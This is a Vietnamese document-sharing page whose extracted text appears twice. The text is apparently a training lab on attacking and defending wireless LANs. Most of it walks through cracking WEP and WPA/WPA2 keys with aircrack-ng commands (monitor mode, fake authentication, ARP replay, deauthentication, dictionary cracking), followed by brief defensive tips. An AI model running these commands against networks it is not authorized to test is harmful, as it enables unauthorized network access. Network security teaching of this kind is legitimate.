Cách tấn công và phòng thủ mạng Wireless LAN
Số trang: 17
Loại file: doc
Dung lượng: 3.61 MB
Lượt xem: 8
Lượt tải: 0
Xem trước 2 trang đầu tiên của tài liệu này:
Thông tin tài liệu:
Chuẩn bị: Đầu tiên máy phải kết nối mạng theo mô hình trên, ta cần một máy tính có gắn card wireless được backtrack hỗ trợ để hack, và cuối cùng ta sử dụng disc hoặc usb có chứa phần mềm backtrack 4 Final
Nội dung trích xuất từ tài liệu:
Cách tấn công và phòng thủ mạng Wireless LAN CÁCH TẤN CÔNG VÀ PHÒNG THỦ MẠNG WIRELESS LANMÔ HÌNH:TẤN CÔNG MẠNG WIRELESS LAN SỬ DỤNG BẢO MẬT DẠNG WEP :CHUẨN BỊ :Đầu tiên các máy phải kết nối mạng theo mô hình trênTa cần một máy tính có gắn card wireless được backtrack hỗ trợ để hackVà cuối cùng ta sử dụng một disc hoặc usb có chứa phần mềm backtrack 4 FINALCÁC BƯỚC THỰC HIỆN:BƯỚC 1:Ta vào bios cấu hình máy tính khởi động từ disc hay usbBƯỚC 2:SỬ DỤNG GIAO DIỆN ĐỒ HỌA TRONG MÔI TRƯỜNG BACKTRACK 4 FINALTừ dấu nhắc ta sử dụng lệnh StartxBƯỚC 3 :CHUYỂN CARD SANG CHẾ ĐỘ MONITORMở terminal (tương tự dos trong windown) và gõ lệnh IWCONFIGChuyển sang chế độ monitor ta dùng lệnh : airmon-ng start wlan0 (wlan0 là tên card mạng có thểmỗi máy có tên card mạng khác như ath0)BƯỚC 4:TÌM ACCESS POINT (AP) PHÁT SÓNG XUNG QUANHGõ lệnh : airodump-ng wlan0BƯỚC 5:CHỌN AP CẦN TẤN CÔNGMở terminal thứ 2 lên gõ lệnh : airodump-ng -w wep –c 6 –bssid 00:1B:11:58:7B:A9 wlan0BƯỚC 6 :HACKER GIẢ ADDRESS (WIRELESS CLIENT) ĐỂ CHỨNG THỰC VỚI APMở terminal thứ 3 gõ lệnh : aireplay-ng -1 0 –a 00:1B:11:58:7B:A9 wlan0BƯỚC 7 :Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thập các gói tập tin nhanh hơn để giảimã tìm keyMở terminal 4 gõ lệnh : aireplay-ng -3 –b 00:1B:11:58:7B:A9 wlan0BƯỚC 8 :Xem traffic thu thập được bao nhiêu nếu (wep 64 bit thì từ 10000 đến 40000 thì ta đã giảimã được còn đối với wep 128bit thì có thể ta cần đến 110000 để giải mã ) ta trở lại màn hình ởbước 5 coi ở cột Data đã được bao nhiêu góiBước 9 : TÌM KEY :Ta sử dụng lệnh aircrack-ng wep-01.cap wlan0 Đây là hình ảnh key mà ta tìm đượcTẤN CÔNG MẠNG WLAN SỬ DUNG DẠNG BẢO MẬT WPA YÊU CẦU: vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz . vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target. Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES. CÁC BƯỚC TIẾN HÀNH CRACK: vCÀI ĐẶT SQLite như sau: tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz cd sqlite-3.5.7 ./configure --prefix=/usr/local MakeCRACK WPA TKIP:·Chuyển card wireless về monitor mode như hình sau:• Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hìnhsau :Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:Thế là ta đã capture được 4 bước bắt tay với AP target.• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm initvới vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt/* với dictionary.txt là list chứa tên các ssid */Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst/* với password.lst là file chứa các password */Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:Airolib-ng vnpro_gtvt_hcm batchkiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:Airolib-ng vnpro_gtvt_hcm statsmở một shell mới chạy tool aircrack-ng để tìm khoá :aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.capSau khi lệnh thực hiện xong, ta thu được keyQuá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như vi ệccrack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trênCRACK WAP AESKhoá tìm được :CRACK WPA2 AESCRACK WPA2 TKIP+AESChạy lệnh tool aircrack để tìm keyTìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes) CÁC BƯỚC PHÒNG THỦ Password phức tạp P@ssw0rd (ít nhất là 10 ký tự trở lên, gồmo4 thành phần) Bảo mât wlan bằng IP Address chúng ta không cho accesspointocấp địa chỉ IP động (disable DHCP) cho các wireless client hay dùng kỹthuật phân chia mạng con (supnetting) để cấp số lượng IP cho phù hợpvới số lượng wireless clietn phù hợp trong mạng ẩn SSID (DISABLE BROADCAST)o Lọc MAC ADDRESS : Sử dụng tính năng lọc MAC address đểocho phép hoặc không cho phép 1 số wireles ...
Nội dung trích xuất từ tài liệu:
Cách tấn công và phòng thủ mạng Wireless LAN CÁCH TẤN CÔNG VÀ PHÒNG THỦ MẠNG WIRELESS LANMÔ HÌNH:TẤN CÔNG MẠNG WIRELESS LAN SỬ DỤNG BẢO MẬT DẠNG WEP :CHUẨN BỊ :Đầu tiên các máy phải kết nối mạng theo mô hình trênTa cần một máy tính có gắn card wireless được backtrack hỗ trợ để hackVà cuối cùng ta sử dụng một disc hoặc usb có chứa phần mềm backtrack 4 FINALCÁC BƯỚC THỰC HIỆN:BƯỚC 1:Ta vào bios cấu hình máy tính khởi động từ disc hay usbBƯỚC 2:SỬ DỤNG GIAO DIỆN ĐỒ HỌA TRONG MÔI TRƯỜNG BACKTRACK 4 FINALTừ dấu nhắc ta sử dụng lệnh StartxBƯỚC 3 :CHUYỂN CARD SANG CHẾ ĐỘ MONITORMở terminal (tương tự dos trong windown) và gõ lệnh IWCONFIGChuyển sang chế độ monitor ta dùng lệnh : airmon-ng start wlan0 (wlan0 là tên card mạng có thểmỗi máy có tên card mạng khác như ath0)BƯỚC 4:TÌM ACCESS POINT (AP) PHÁT SÓNG XUNG QUANHGõ lệnh : airodump-ng wlan0BƯỚC 5:CHỌN AP CẦN TẤN CÔNGMở terminal thứ 2 lên gõ lệnh : airodump-ng -w wep –c 6 –bssid 00:1B:11:58:7B:A9 wlan0BƯỚC 6 :HACKER GIẢ ADDRESS (WIRELESS CLIENT) ĐỂ CHỨNG THỰC VỚI APMở terminal thứ 3 gõ lệnh : aireplay-ng -1 0 –a 00:1B:11:58:7B:A9 wlan0BƯỚC 7 :Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thập các gói tập tin nhanh hơn để giảimã tìm keyMở terminal 4 gõ lệnh : aireplay-ng -3 –b 00:1B:11:58:7B:A9 wlan0BƯỚC 8 :Xem traffic thu thập được bao nhiêu nếu (wep 64 bit thì từ 10000 đến 40000 thì ta đã giảimã được còn đối với wep 128bit thì có thể ta cần đến 110000 để giải mã ) ta trở lại màn hình ởbước 5 coi ở cột Data đã được bao nhiêu góiBước 9 : TÌM KEY :Ta sử dụng lệnh aircrack-ng wep-01.cap wlan0 Đây là hình ảnh key mà ta tìm đượcTẤN CÔNG MẠNG WLAN SỬ DUNG DẠNG BẢO MẬT WPA YÊU CẦU: vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz . vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target. Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES. CÁC BƯỚC TIẾN HÀNH CRACK: vCÀI ĐẶT SQLite như sau: tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz cd sqlite-3.5.7 ./configure --prefix=/usr/local MakeCRACK WPA TKIP:·Chuyển card wireless về monitor mode như hình sau:• Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hìnhsau :Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:Thế là ta đã capture được 4 bước bắt tay với AP target.• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm initvới vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt/* với dictionary.txt là list chứa tên các ssid */Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst/* với password.lst là file chứa các password */Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:Airolib-ng vnpro_gtvt_hcm batchkiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:Airolib-ng vnpro_gtvt_hcm statsmở một shell mới chạy tool aircrack-ng để tìm khoá :aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.capSau khi lệnh thực hiện xong, ta thu được keyQuá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như vi ệccrack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trênCRACK WAP AESKhoá tìm được :CRACK WPA2 AESCRACK WPA2 TKIP+AESChạy lệnh tool aircrack để tìm keyTìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes) CÁC BƯỚC PHÒNG THỦ Password phức tạp P@ssw0rd (ít nhất là 10 ký tự trở lên, gồmo4 thành phần) Bảo mât wlan bằng IP Address chúng ta không cho accesspointocấp địa chỉ IP động (disable DHCP) cho các wireless client hay dùng kỹthuật phân chia mạng con (supnetting) để cấp số lượng IP cho phù hợpvới số lượng wireless clietn phù hợp trong mạng ẩn SSID (DISABLE BROADCAST)o Lọc MAC ADDRESS : Sử dụng tính năng lọc MAC address đểocho phép hoặc không cho phép 1 số wireles ...
Tìm kiếm theo từ khóa liên quan:
mạng Lan bảo mật dạng WEP thủ thuật máy tính bảo mật máy tính an ninh máy tínhTài liệu liên quan:
-
Top 10 mẹo 'đơn giản nhưng hữu ích' trong nhiếp ảnh
11 trang 321 0 0 -
Làm việc với Read Only Domain Controllers
20 trang 312 0 0 -
73 trang 247 0 0
-
Sửa lỗi các chức năng quan trọng của Win với ReEnable 2.0 Portable Edition
5 trang 219 0 0 -
Phương pháp bảo vệ và khác phục sự cố máy tính: Phần 2
99 trang 217 0 0 -
Phần III: Xử lý sự cố Màn hình xanh
3 trang 210 0 0 -
Giáo trình Bảo trì hệ thống và cài đặt phần mềm
68 trang 209 0 0 -
Tổng hợp 30 lỗi thương gặp cho những bạn mới sử dụng máy tính
9 trang 208 0 0 -
Sao lưu dữ liệu Gmail sử dụng chế độ Offline
8 trang 205 0 0 -
UltraISO chương trình ghi đĩa, tạo ổ đĩa ảo nhỏ gọn
10 trang 204 0 0